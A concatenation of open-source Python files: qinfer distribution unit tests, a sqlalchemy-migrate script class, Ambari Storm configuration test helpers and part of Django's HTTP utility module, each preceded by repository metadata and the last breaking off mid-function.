        dist2 = MultivariateNormalDistribution(np.array([1,2]),np.array([[2,0],[0,3]]))
        dist = ProductDistribution(dist1, dist2)
        # n_rvs of a product is the sum of the factors' n_rvs: 1 + 2.
        assert(dist.n_rvs == 3)
class TestSingleSampleMixin(DerandomizedTestCase):
    """
    Tests ``SingleSampleMixin``
    """
    ## TEST METHODS ##
    def test_single_sample_mixin(self):
        """
        Distributions: Tests that subclassing from
        SingleSampleMixin works.
        """
        # Minimal subclass: delegates n_rvs and single-sample draws to a
        # wrapped distribution; the mixin presumably assembles sample(n)
        # from repeated _sample() calls (shapes asserted below).
        class TestDist(SingleSampleMixin, Distribution):
            def __init__(self, dist):
                super(TestDist, self).__init__()
                self._dist = dist
            @property
            def n_rvs(self):
                return self._dist.n_rvs
            def _sample(self):
                return self._dist.sample(n=1)
        dist1 = TestDist(NormalDistribution(0,1))
        dist2 = TestDist(MultivariateNormalDistribution(np.array([1,2]),np.array([[2,0],[0,3]])))
        sample1 = dist1.sample(500)
        sample2 = dist2.sample(500)
        assert(sample1.shape == (500,1))
        assert(sample2.shape == (500,2))
        assert_almost_equal(np.round(np.mean(sample1,axis=0)), 0)
        assert_almost_equal(np.round(np.mean(sample2,axis=0)), np.array([1,2]))
class TestHaarUniform(DerandomizedTestCase):
    """
    Tests ``HaarUniform``
    """
    ## TEST METHODS ##
    def test_haar_state_mean(self):
        """
        Distributions: Checks that HaarUniform
        has the correct mean.
        """
        dist = HaarUniform()
        samples = dist.sample(1000)
        # Each sample carries Bloch components (x, y, z). For Haar-random
        # states the mean Bloch vector vanishes, so the traceless part of
        # the mean state -- sum of mean components times the Pauli
        # matrices -- should be (approximately) the zero matrix.
        x = np.mean(samples[:,0]) * np.array([[0,1],[1,0]])
        y = np.mean(samples[:,1]) * np.array([[0,-1j],[1j,0]])
        # BUG FIX: the z component must be weighted by the Pauli Z matrix
        # diag(1, -1); the original used the identity matrix, which only
        # went unnoticed because the mean component is ~0 either way.
        z = np.mean(samples[:,2]) * np.array([[1,0],[0,-1]])
        rho = x + y + z
        assert_almost_equal(rho, np.zeros((2,2)), 2)
    def test_haar_state_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = HaarUniform()
        assert(dist.n_rvs == 3)
class TestMixtureDistribution(DerandomizedTestCase):
    """
    Tests ``MixtureDistribution``
    """
    ## TEST METHODS ##
    def test_mixture_moments(self):
        """
        Distributions: Checks that MixtureDistributions
        has the correct mean value for the normal
        distrubution under both input formats.
        """
        weights = np.array([0.25, 0.25, 0.5])
        means = np.array([1,2,3])
        # NOTE(review): `vars` shadows the builtin of the same name;
        # consider renaming to `variances` in a follow-up.
        vars = np.array([.5, .2, .8])
        dist_list = [
            NormalDistribution(means[idx], vars[idx])
            for idx in range(3)
        ]
        # Test both input formats
        mix1 = MixtureDistribution(weights, dist_list)
        mix2 = MixtureDistribution(weights, NormalDistribution,
            dist_args=np.vstack([means,vars]).T)
        # Also test with kwargs
        mix3 = MixtureDistribution(weights, NormalDistribution,
            dist_args=np.vstack([means,vars]).T,
            dist_kw_args={'trunc': np.vstack([means-vars/5,means+vars/5]).T})
        # Also test without the shuffle
        mix4 = MixtureDistribution(weights, dist_list, shuffle=False)
        s1 = mix1.sample(150000)
        s2 = mix2.sample(150000)
        s3 = mix3.sample(150000)
        s4 = mix4.sample(150000)
        # The mean should be the weighted means.
        assert_almost_equal(s1.mean(), np.dot(weights, means), 2)
        assert_almost_equal(s2.mean(), np.dot(weights, means), 2)
        assert_almost_equal(s3.mean(), np.dot(weights, means), 2)
        assert_almost_equal(s4.mean(), np.dot(weights, means), 2)
        # The variance should be given by the law of total variance
        assert_almost_equal(
            np.var(s1),
            np.dot(weights, vars) + np.dot(weights, means**2) - np.dot(weights, means)**2,
            1
        )
        assert_almost_equal(
            np.var(s2),
            np.dot(weights, vars) + np.dot(weights, means**2) - np.dot(weights, means)**2,
            1
        )
        # Skip the variance test for s3 because truncation messes with it.
        assert_almost_equal(
            np.var(s4),
            np.dot(weights, vars) + np.dot(weights, means**2) - np.dot(weights, means)**2,
            1
        )
    def test_mixture_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        # Mixture of univariate components: one random variable.
        weights = np.array([0.25, 0.25, 0.5])
        means = np.array([1,2,3])
        vars = np.array([.5, .2, .8])
        dist_list = [
            NormalDistribution(means[idx], vars[idx])
            for idx in range(3)
        ]
        dist = MixtureDistribution(weights, dist_list)
        assert(dist.n_rvs == 1)
        # Mixture of bivariate components: two random variables.
        weights = np.array([0.25, 0.25, 0.5])
        means = np.array([[1,0],[2,0],[3,1]])
        vars = np.array([[[1,0.2],[0.2,2]],[[3,0.2],[0.2,2]],[[2,0.2],[0.2,2]]])
        dist_list = [
            MultivariateNormalDistribution(means[idx], vars[idx])
            for idx in range(3)
        ]
        dist = MixtureDistribution(weights, dist_list)
        assert(dist.n_rvs == 2)
class TestParticleDistribution(DerandomizedTestCase):
    """
    Tests ``ParticleDistribution``
    """
    ## TEST METHODS ##
    def test_init(self):
        """
        Distributions: Checks that ParticleDistributions
        initialized correctly in different circumstances.
        """
        dim = 5
        n_particles = 100
        # Note that these weights are not all positive; the class is
        # expected to rectify and normalize them (asserted below).
        # BUG FIX: draw one weight per particle -- the original drew only
        # `dim` (5) weights for 100 particle locations. Also dropped the
        # no-op line `particle_weights = particle_weights`.
        particle_weights = np.random.randn(n_particles)
        particle_locations = np.random.rand(n_particles, dim)
        dist1 = ParticleDistribution(n_mps=dim)
        dist2 = ParticleDistribution(
            particle_weights=particle_weights,
            particle_locations=particle_locations
        )
        # With no particles supplied, a single unit-weight particle at the
        # origin is expected.
        assert(dist1.n_particles == 1)
        assert(dist1.n_rvs == dim)
        assert_almost_equal(dist1.sample(3), np.zeros((3, dim)))
        assert_almost_equal(np.sum(dist1.particle_weights), 1)
        assert(dist2.n_particles == n_particles)
        assert(dist2.n_rvs == dim)
        assert(dist2.sample(3).shape == (3,dim))
        # the following demands that ParticleDistribution
        # rectifies and normalizes whichever weights it is given
        assert_almost_equal(np.sum(dist2.particle_weights), 1)
    def test_ness(self):
        """
        Distributions: Tests the n_ess property of the
        ParticleDistribution.
        """
        dim = 5
        n_particles = 100
        # Uniform weights: effective sample size equals n_particles.
        particle_weights1 = np.ones(n_particles) / n_particles
        # All weight on one particle: effective sample size is 1.
        particle_weights2 = np.zeros(n_particles)
        particle_weights2[0] = 1
        # Random weights: n_ess must lie strictly between the extremes.
        # BUG FIX: draw one weight per particle -- the original drew only
        # `dim` (5) weights for 100 particle locations.
        particle_weights3 = np.random.rand(n_particles)
        particle_weights3 = particle_weights3 / np.sum(particle_weights3)
        particle_locations = np.random.rand(n_particles, dim)
        dist1 = ParticleDistribution(
            particle_weights=particle_weights1,
            particle_locations=particle_locations
        )
        dist2 = ParticleDistribution(
            particle_weights=particle_weights2,
            particle_locations=particle_locations
        )
        dist3 = ParticleDistribution(
            particle_weights=particle_weights3,
            particle_locations=particle_locations
        )
        assert_almost_equal(dist1.n_ess, n_particles)
        assert_almost_equal(dist2.n_ess, 1)
        assert(dist3.n_ess < n_particles and dist3.n_ess > 1)
    def test_moments(self):
        """
        Distributions: Tests the moment function (est_mean, etc)
        of ParticleDistribution.
        """
        dim = 5
        n_particles = 100000
        # draw particles from a randomly chosen mutivariate normal
        mu = np.random.randn(dim)
        cov = np.random.randn(dim,dim)
        cov = np.dot(cov,cov.T)
        particle_locations = np.random.multivariate_normal(mu, cov, n_particles)
        particle_weights = np.random.rand(n_particles)
        dist = ParticleDistribution(
            particle_weights=particle_weights,
            particle_locations=particle_locations
        )
        # Weighted estimators should recover the generating normal's
        # mean, second moment and covariance up to sampling error.
        assert_sigfigs_equal(mu, dist.est_mean(), 1)
        assert_almost_equal(dist.est_meanfn(lambda x: x**2),np.diag(cov) + mu**2, 0)
        assert(np.linalg.norm(dist.est_covariance_mtx() - cov) < 0.5)
    def test_entropy(self):
        """
        Distributions: Tests the entropy and related functions of
        ParticleDistributions.
        """
        dim = 3
        n_particles = 100
        # draw particles from a randomly chosen mutivariate normal
        mu = np.random.randn(dim)
        cov = np.random.randn(dim,dim)
        cov = np.dot(cov,cov.T)
        particle_locations = np.random.multivariate_normal(mu, cov, n_particles)
        particle_weights1 = np.ones(n_particles)
        particle_weights2 = np.random.rand(n_particles)
        dist1 = ParticleDistribution(
            particle_weights=particle_weights1,
            particle_locations=particle_locations
        )
        dist2 = ParticleDistribution(
            particle_weights=particle_weights2,
            particle_locations=particle_locations
        )
        # Uniform weights give the maximum entropy log(n_particles).
        assert_almost_equal(dist1.est_entropy(), np.log(n_particles))
        #TODO: test that est_kl_divergence does more than not fail
        dist1.est_kl_divergence(dist2)
    def test_clustering(self):
        """
        Distributions: Tests that clustering works.
        """
        dim = 3
        n_particles = 1000
        # make two multivariate normal clusters
        mu1 = 50+np.zeros(dim)
        mu2 = -50+np.zeros(dim)
        cov = np.random.randn(dim,dim)
        cov = np.dot(cov,cov.T)
        particle_locations = np.concatenate([
            np.random.multivariate_normal(mu1, cov, int(n_particles/2)),
            np.random.multivariate_normal(mu2, cov, int(n_particles/2))
        ])
        particle_weights = np.ones(n_particles)
        dist = ParticleDistribution(
            particle_weights=particle_weights,
            particle_locations=particle_locations
        )
        # TODO: do more than check these don't fail (I didn't have time
        # to figure out the undocumented code.)
        dist.est_cluster_moments()
        dist.est_cluster_covs()
        dist.est_cluster_metric()
class TestInterpolatedUnivariateDistribution(DerandomizedTestCase):
    """
    Tests ``InterpolatedUnivariateDistribution``
    """
    def test_interp_moments(self):
        """
        Distributions: Checks that the interpolated distribution
        has the right moments.
        """
        # Interpolate the normal distribution because we
        # know the moments
        # NOTE(review): the positional arguments (pdf, 1, 1500) configure
        # the interpolation -- check the constructor signature for their
        # exact meaning before changing them.
        dist = InterpolatedUnivariateDistribution(
            scipy.stats.norm.pdf, 1, 1500
        )
        samples = dist.sample(40000)
        assert_almost_equal(1, samples.var(), 1)
        assert_almost_equal(0, samples.mean(), 1)
    def test_interp_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        dist = InterpolatedUnivariateDistribution(
            scipy.stats.norm.pdf, 1, 1500
        )
        assert(dist.n_rvs == 1)
class TestPostselectedDistribution(DerandomizedTestCase):
    """
    Tests ``PostselectedDistribution``
    """
    def test_postselected_validity(self):
        """
        Distributions: Checks that the postselected
        samples are valid.
        """
        ud = NormalDistribution(0, 1)
        # Stand-in for a qinfer Model exposing only are_models_valid;
        # rejection sampling should keep only non-negative draws.
        class FakeModel(object):
            def are_models_valid(self, mps):
                return mps >= 0
        dist = PostselectedDistribution(
            ud, FakeModel()
        )
        samples = dist.sample(40000)
        assert_array_less(0, samples)
    def test_postselected_fails(self):
        """
        Distributions: Checks that the postselected
        fails to generate enough points with a
        difficult constraint.
        """
        ud = NormalDistribution(0, 1)
        # N(0, 1) essentially never exceeds 1000, so postselection cannot
        # succeed and must give up with a RuntimeError.
        class FakeModel(object):
            def are_models_valid(self, mps):
                return mps >= 1000
        # The third argument (30) is presumably the maximum number of
        # resampling attempts -- confirm against the constructor signature.
        dist = PostselectedDistribution(
            ud, FakeModel(), 30
        )
        self.assertRaises(
            RuntimeError,
            dist.sample,
            10000
        )
    def test_postselected_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        ud = NormalDistribution(0, 1)
        class FakeModel(object):
            def are_models_valid(self, mps):
                return mps >= 1000
        dist = PostselectedDistribution(
            ud, FakeModel(), 30
        )
        assert(dist.n_rvs == 1)
class TestConstrainedSumDistribution(DerandomizedTestCase):
    """
    Tests ``ConstrainedSumDistribution``
    """
    def test_constrained_sum_constraint(self):
        """
        Distributions: Tests that the constraint is met in
        the constrained sum distribution.
        """
        unif = UniformDistribution([[0,1],[0,2]])
        dist = ConstrainedSumDistribution(unif, 3)
        samples = dist.sample(1000)
        # Every sample's coordinates must sum to exactly 3.
        assert_almost_equal(
            np.sum(samples, axis=1),
            3 * np.ones(1000)
        )
    def test_constrained_sum_moments(self):
        """
        Distributions: Tests that the constrained sum
        distribution has the right moments.
        """
        # Symmetric ranges with sum constrained to 1: each coordinate's
        # mean should be 1/2.
        unif = UniformDistribution([[0,1],[0,1]])
        dist = ConstrainedSumDistribution(unif, 1)
        samples = dist.sample(100000)
        assert_sigfigs_equal(np.array([1/2]*2), np.mean(samples, axis=0), 2)
    def test_constrained_sum_n_rvs(self):
        """
        Distributions: Tests for expected number of RVS.
        """
        unif = UniformDistribution([[0,1],[0,2]])
        dist = ConstrainedSumDistribution(unif, 3)
        assert(dist.n_rvs == 2)
| agpl-3.0 |
VagrantApe/flaskMicroblog | venv/lib/python2.7/site-packages/migrate/versioning/script/py.py | 65 | 5483 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import shutil
import warnings
import logging
import inspect
from StringIO import StringIO
import migrate
from migrate.versioning import genmodel, schemadiff
from migrate.versioning.config import operations
from migrate.versioning.template import Template
from migrate.versioning.script import base
from migrate.versioning.util import import_path, load_model, with_engine
from migrate.exceptions import MigrateDeprecationWarning, InvalidScriptError, ScriptError
log = logging.getLogger(__name__)
__all__ = ['PythonScript']
class PythonScript(base.BaseScript):
    """Base for Python scripts

    NOTE: this module is Python 2 only (``except Exception, e`` syntax,
    ``basestring``, ``StringIO``).
    """

    @classmethod
    def create(cls, path, **opts):
        """Create an empty migration script at specified path

        :returns: :class:`PythonScript instance <migrate.versioning.script.py.PythonScript>`"""
        cls.require_notfound(path)

        # Copy the selected template (default theme unless overridden via
        # opts) into place, then wrap the new file.
        src = Template(opts.pop('templates_path', None)).get_script(theme=opts.pop('templates_theme', None))
        shutil.copy(src, path)

        return cls(path)

    @classmethod
    def make_update_script_for_model(cls, engine, oldmodel,
                                     model, repository, **opts):
        """Create a migration script based on difference between two SA models.

        :param repository: path to migrate repository
        :param oldmodel: dotted.module.name:SAClass or SAClass object
        :param model: dotted.module.name:SAClass or SAClass object
        :param engine: SQLAlchemy engine
        :type repository: string or :class:`Repository instance <migrate.versioning.repository.Repository>`
        :type oldmodel: string or Class
        :type model: string or Class
        :type engine: Engine instance
        :returns: Upgrade / Downgrade script
        :rtype: string
        """
        if isinstance(repository, basestring):
            # oh dear, an import cycle!
            from migrate.versioning.repository import Repository
            repository = Repository(repository)

        oldmodel = load_model(oldmodel)
        model = load_model(model)

        # Compute differences.
        diff = schemadiff.getDiffOfModelAgainstModel(
            model,
            oldmodel,
            excludeTables=[repository.version_table])
        # TODO: diff can be False (there is no difference?)

        decls, upgradeCommands, downgradeCommands = \
            genmodel.ModelGenerator(diff,engine).genB2AMigration()

        # Store differences into file.
        src = Template(opts.pop('templates_path', None)).get_script(opts.pop('templates_theme', None))
        f = open(src)
        contents = f.read()
        f.close()

        # generate source: splice the generated declarations in just before
        # upgrade(), then replace the template's placeholder bodies with
        # the generated upgrade and downgrade commands (first match each).
        search = 'def upgrade(migrate_engine):'
        contents = contents.replace(search, '\n\n'.join((decls, search)), 1)
        if upgradeCommands:
            contents = contents.replace('    pass', upgradeCommands, 1)
        if downgradeCommands:
            contents = contents.replace('    pass', downgradeCommands, 1)
        return contents

    @classmethod
    def verify_module(cls, path):
        """Ensure path is a valid script

        :param path: Script location
        :type path: string
        :raises: :exc:`InvalidScriptError <migrate.exceptions.InvalidScriptError>`
        :returns: Python module
        """
        # Try to import and get the upgrade() func
        module = import_path(path)
        try:
            assert callable(module.upgrade)
        except Exception, e:
            raise InvalidScriptError(path + ': %s' % str(e))
        return module

    def preview_sql(self, url, step, **args):
        """Mocks SQLAlchemy Engine to store all executed calls in a string
        and runs :meth:`PythonScript.run <migrate.versioning.script.py.PythonScript.run>`

        :returns: SQL file
        """
        buf = StringIO()
        # The 'mock' strategy never touches a database; the executor
        # captures each emitted statement into the buffer instead.
        args['engine_arg_strategy'] = 'mock'
        args['engine_arg_executor'] = lambda s, p = '': buf.write(str(s) + p)

        @with_engine
        def go(url, step, **kw):
            engine = kw.pop('engine')
            self.run(engine, step)
            return buf.getvalue()

        return go(url, step, **args)

    def run(self, engine, step):
        """Core method of Script file.
        Executes :func:`upgrade` or :func:`downgrade` functions

        :param engine: SQLAlchemy Engine
        :param step: Operation to run (positive upgrades, negative downgrades)
        :type engine: Engine instance
        :type step: int
        """
        if step > 0:
            op = 'upgrade'
        elif step < 0:
            op = 'downgrade'
        else:
            raise ScriptError("%d is not a valid step" % step)

        funcname = base.operations[op]
        script_func = self._func(funcname)

        # check for old way of using engine
        if not inspect.getargspec(script_func)[0]:
            raise TypeError("upgrade/downgrade functions must accept engine"
                            " parameter (since version 0.5.4)")

        script_func(engine)

    @property
    def module(self):
        """Calls :meth:`migrate.versioning.script.py.verify_module`
        and returns it.
        """
        # Imported lazily and memoized on first access.
        if not hasattr(self, '_module'):
            self._module = self.verify_module(self.path)
        return self._module

    def _func(self, funcname):
        # Look up the upgrade/downgrade callable inside the script module.
        if not hasattr(self.module, funcname):
            msg = "Function '%s' is not defined in this script"
            raise ScriptError(msg % funcname)
        return getattr(self.module, funcname)
| bsd-3-clause |
arenadata/ambari | ambari-server/src/test/python/stacks/2.1/STORM/test_storm_base.py | 1 | 6733 | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from mock.mock import MagicMock, call, patch
import resource_management.core.source
from stacks.utils.RMFTestCase import *
import re
class TestStormBase(RMFTestCase):
    """Shared assertion helpers for the Storm service RMF tests.

    NOTE: Python 2 only (octal literals like ``0777``). The
    assertResourceCalled sequences are order-sensitive: they must match the
    exact order in which the scripts declare resources.
    """
    COMMON_SERVICES_PACKAGE_DIR = "STORM/0.9.1/package"
    STACK_VERSION = "2.1"

    def assert_configure_default(self, confDir="/etc/storm/conf", has_metrics=False, legacy=True):
        # Asserts the resource sequence for a non-secured Storm configure().
        # Returns the rendered storm.yaml content for further checks.
        import params
        self.assertResourceCalled('Directory', '/var/log/storm',
            owner = 'storm',
            group = 'hadoop',
            mode = 0777,
            create_parents = True,
            cd_access='a',
        )
        self.assertResourceCalled('Directory', '/var/run/storm',
            owner = 'storm',
            group = 'hadoop',
            create_parents = True,
            cd_access='a',
            mode=0755,
        )
        self.assertResourceCalled('Directory', '/hadoop/storm',
            owner = 'storm',
            group = 'hadoop',
            create_parents = True,
            cd_access='a',
            mode=0755,
        )
        self.assertResourceCalled('Directory', confDir,
            group = 'hadoop',
            create_parents = True,
            cd_access='a'
        )
        self.assertResourceCalled('File', '/etc/security/limits.d/storm.conf',
            content = Template('storm.conf.j2'),
            owner = 'root',
            group = 'root',
            mode = 0644,
        )
        self.assertResourceCalled('File', confDir + '/config.yaml',
            owner = 'storm',
            content = Template('config.yaml.j2'),
            group = 'hadoop',
        )
        storm_yarn_content = self.call_storm_template_and_assert(confDir=confDir)
        # In the default (non-kerberized) case the JAAS placeholder must
        # have been removed from the rendered storm.yaml.
        self.assertTrue(storm_yarn_content.find('_JAAS_PLACEHOLDER') == -1, 'Placeholder have to be substituted')
        self.assertResourceCalled('File', confDir + '/storm-env.sh',
            owner = 'storm',
            content = InlineTemplate(self.getConfig()['configurations']['storm-env']['content'])
        )
        if has_metrics:
            # AMS integration: the metrics sink jar is re-linked; the jar
            # name differs between legacy and current sink packaging.
            self.assertResourceCalled('File', confDir + '/storm-metrics2.properties',
                content = Template('storm-metrics2.properties.j2'),
                owner = 'storm',
                group = 'hadoop',
            )
            self.assertResourceCalled('Link', '/usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
                action = ['delete'],
            )
            self.assertResourceCalled('Link', '/usr/lib/storm/lib/ambari-metrics-storm-sink.jar',
                action = ['delete'],
            )
            if legacy:
                self.assertResourceCalled('Execute', 'ambari-sudo.sh ln -s /usr/lib/storm/lib/ambari-metrics-storm-sink-legacy-with-common-*.jar /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
                    not_if = 'ls /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
                    only_if = 'ls /usr/lib/storm/lib/ambari-metrics-storm-sink-legacy-with-common-*.jar',
                )
            else:
                self.assertResourceCalled('Execute', 'ambari-sudo.sh ln -s /usr/lib/storm/lib/ambari-metrics-storm-sink-with-common-*.jar /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
                    not_if = 'ls /usr/lib/storm/lib//ambari-metrics-storm-sink.jar',
                    only_if = 'ls /usr/lib/storm/lib/ambari-metrics-storm-sink-with-common-*.jar',
                )
        # Non-secured configure removes any stale JAAS files.
        self.assertResourceCalled('File', confDir + '/storm_jaas.conf',
            action=['delete'],
        )
        self.assertResourceCalled('File', confDir + '/client_jaas.conf',
            action=['delete'],
        )
        return storm_yarn_content

    def assert_configure_secured(self, confDir='/etc/storm/conf'):
        # Asserts the resource sequence for a kerberized Storm configure();
        # differs from the default case by writing storm_jaas.conf instead
        # of deleting the JAAS files.
        import params
        self.assertResourceCalled('Directory', '/var/log/storm',
            owner = 'storm',
            group = 'hadoop',
            mode = 0777,
            create_parents = True,
            cd_access='a',
        )
        self.assertResourceCalled('Directory', '/var/run/storm',
            owner = 'storm',
            group = 'hadoop',
            create_parents = True,
            cd_access='a',
            mode=0755,
        )
        self.assertResourceCalled('Directory', '/hadoop/storm',
            owner = 'storm',
            group = 'hadoop',
            create_parents = True,
            cd_access='a',
            mode=0755,
        )
        self.assertResourceCalled('Directory', confDir,
            group = 'hadoop',
            create_parents = True,
            cd_access='a'
        )
        self.assertResourceCalled('File', '/etc/security/limits.d/storm.conf',
            content = Template('storm.conf.j2'),
            owner = 'root',
            group = 'root',
            mode = 0644,
        )
        self.assertResourceCalled('File', confDir + '/config.yaml',
            owner = 'storm',
            content = Template('config.yaml.j2'),
            group = 'hadoop',
        )
        storm_yarn_content = self.call_storm_template_and_assert(confDir=confDir)
        self.assertTrue(storm_yarn_content.find('_JAAS_PLACEHOLDER') == -1, 'Placeholder have to be substituted')
        self.assertResourceCalled('File', confDir + '/storm-env.sh',
            owner = 'storm',
            content = InlineTemplate(self.getConfig()['configurations']['storm-env']['content'])
        )
        self.assertResourceCalled('TemplateConfig', confDir + '/storm_jaas.conf',
            owner = 'storm',
            mode = 0644
        )
        return storm_yarn_content

    def call_storm_template_and_assert(self, confDir="/etc/storm/conf"):
        # Renders storm-site through the same YAML template the scripts use
        # and asserts the storm.yaml File resource; returns the rendered text.
        import storm_yaml_utils
        with RMFTestCase.env as env:
            storm_yarn_temlate = storm_yaml_utils.yaml_config_template(self.getConfig()['configurations']['storm-site'])
            self.assertResourceCalled('File', confDir + '/storm.yaml',
                owner = 'storm',
                content= storm_yarn_temlate,
                group = 'hadoop'
            )
        return storm_yarn_temlate.get_content()
| apache-2.0 |
andreif/django | django/utils/http.py | 115 | 10153 | from __future__ import unicode_literals
import base64
import calendar
import datetime
import re
import sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import allow_lazy
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, urlencode as original_urlencode,
urlparse,
)
# HTTP ETag: optional weak marker "W/" followed by a quoted string whose
# contents may include backslash-escaped characters. Group 1 is the tag value.
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')

MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
# Building blocks for the three date formats of HTTP RFC2616 section 3.3.1.
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'  # asctime pads single-digit days with a space
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'   # RFC850 uses two-digit years
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = re.compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = re.compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = re.compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))

# RFC 3986 reserved character classes (gen-delims / sub-delims).
RFC3986_GENDELIMS = str(":/?#[]@")
RFC3986_SUBDELIMS = str("!$&'()*+,;=")

# Default ports for the schemes handled by same-origin checks.
PROTOCOL_TO_PORT = {
    'http': 80,
    'https': 443,
}
def urlquote(url, safe='/'):
    """
    Percent-encode ``url`` like urllib.quote(), but safely for unicode
    input: the text is UTF-8 encoded before quoting. The result may be
    passed to a later iri_to_uri() call without being double-quoted.
    """
    encoded = force_str(url)
    quoted = quote(encoded, force_str(safe))
    return force_text(quoted)
urlquote = allow_lazy(urlquote, six.text_type)
def urlquote_plus(url, safe=''):
    """
    Percent-encode ``url`` like urllib.quote_plus() (spaces become '+'),
    but safely for unicode input: the text is UTF-8 encoded before quoting.
    The result may be passed to a later iri_to_uri() call without being
    double-quoted.
    """
    encoded = force_str(url)
    quoted = quote_plus(encoded, force_str(safe))
    return force_text(quoted)
urlquote_plus = allow_lazy(urlquote_plus, six.text_type)
def urlunquote(quoted_url):
    """
    Undo django.utils.http.urlquote(): decode percent-escapes and return
    the result as text.
    """
    raw = unquote(force_str(quoted_url))
    return force_text(raw)
urlunquote = allow_lazy(urlunquote, six.text_type)
def urlunquote_plus(quoted_url):
    """
    A wrapper for Python's urllib.unquote_plus() function that can operate on
    the result of django.utils.http.urlquote_plus().
    """
    return force_text(unquote_plus(force_str(quoted_url)))
# Lazy so it composes with lazily-evaluated strings.
urlunquote_plus = allow_lazy(urlunquote_plus, six.text_type)
def urlencode(query, doseq=0):
    """
    A version of Python's urllib.urlencode() function that can operate on
    unicode strings. The parameters are first cast to UTF-8 encoded strings and
    then encoded as per normal.
    """
    # MultiValueDict stores several values per key; .lists() yields
    # (key, [values]) pairs so repeated parameters survive.
    if isinstance(query, MultiValueDict):
        query = query.lists()
    elif hasattr(query, 'items'):
        query = query.items()
    # Coerce keys and (possibly list-valued) values to bytes before handing
    # off to the stdlib urlencode; doseq is passed through unchanged.
    return original_urlencode(
        [(force_str(k),
          [force_str(i) for i in v] if isinstance(v, (list, tuple)) else force_str(v))
         for k, v in query],
        doseq)
def cookie_date(epoch_seconds=None):
    """
    Format a timestamp for Netscape's cookie standard.

    ``epoch_seconds`` is a float of seconds since the epoch in UTC (such as
    time.time() returns); ``None`` means the current time.

    Returns a string of the form 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
    """
    rfc_1123 = formatdate(epoch_seconds)
    # Rearrange 'Wdy, DD Mon YYYY HH:MM:SS -0000' into the dash-separated
    # cookie form, forcing the 'GMT' zone designator.
    weekday_and_day = rfc_1123[:7]
    month = rfc_1123[8:11]
    time_part = rfc_1123[12:25]
    return '{0}-{1}-{2} GMT'.format(weekday_and_day, month, time_part)
def http_date(epoch_seconds=None):
    """
    Format a timestamp as an RFC 1123 date, the format required by HTTP
    (RFC 2616 section 3.3.1): 'Wdy, DD Mon YYYY HH:MM:SS GMT'.

    ``epoch_seconds`` is a float of seconds since the epoch in UTC (such as
    time.time() returns); ``None`` means the current time.
    """
    # usegmt=True makes formatdate emit the literal 'GMT' zone designator
    # instead of the '-0000' numeric offset.
    rfc_1123 = formatdate(epoch_seconds, usegmt=True)
    return rfc_1123
def parse_http_date(date):
    """
    Parse a date in one of the formats allowed by HTTP RFC 2616 section 3.3.1.

    All three RFC formats are accepted, even though only RFC 1123 is still in
    widespread use. Returns an integer of seconds since the epoch, in UTC.
    Raises ValueError for anything unparseable.
    """
    # email.utils.parsedate does the job for RFC1123 dates; unfortunately
    # RFC2616 makes it mandatory to support RFC850 dates too. So we roll
    # our own RFC-compliant parsing.
    for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
        m = regex.match(date)
        if m is not None:
            break
    else:
        raise ValueError("%r is not in a valid HTTP date format" % date)
    try:
        year = int(m.group('year'))
        if year < 100:
            # RFC 850 allows two-digit years; pivot at 70 so 00-69 map to
            # 2000-2069 and 70-99 to 1970-1999.
            if year < 70:
                year += 2000
            else:
                year += 1900
        month = MONTHS.index(m.group('mon').lower()) + 1
        day = int(m.group('day'))
        hour = int(m.group('hour'))
        # Renamed from 'min'/'sec': 'min' shadowed the builtin min().
        minute = int(m.group('min'))
        second = int(m.group('sec'))
        result = datetime.datetime(year, month, day, hour, minute, second)
        return calendar.timegm(result.utctimetuple())
    except Exception:
        # Re-raise as ValueError while preserving the original traceback
        # (six.reraise keeps this working on both Python 2 and 3).
        six.reraise(ValueError, ValueError("%r is not a valid date" % date), sys.exc_info()[2])
def parse_http_date_safe(date):
    """
    Behave like parse_http_date(), but return None for invalid input
    instead of raising.
    """
    try:
        return parse_http_date(date)
    except Exception:
        return None
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
    """
    Converts a base 36 string to an ``int``. Raises ``ValueError`` if the
    input won't fit into an int.
    """
    # To prevent overconsumption of server resources, reject any
    # base36 string that is longer than 13 base36 digits (13 digits
    # is sufficient to base36-encode any 64-bit integer)
    if len(s) > 13:
        raise ValueError("Base36 input too large")
    value = int(s, 36)
    # ... then do a final check that the value will fit into an int to avoid
    # returning a long (#15067). The long type was removed in Python 3.
    if six.PY2 and value > sys.maxint:
        raise ValueError("Base36 input too large")
    return value
def int_to_base36(i):
    """
    Converts a non-negative integer to a base36 string.

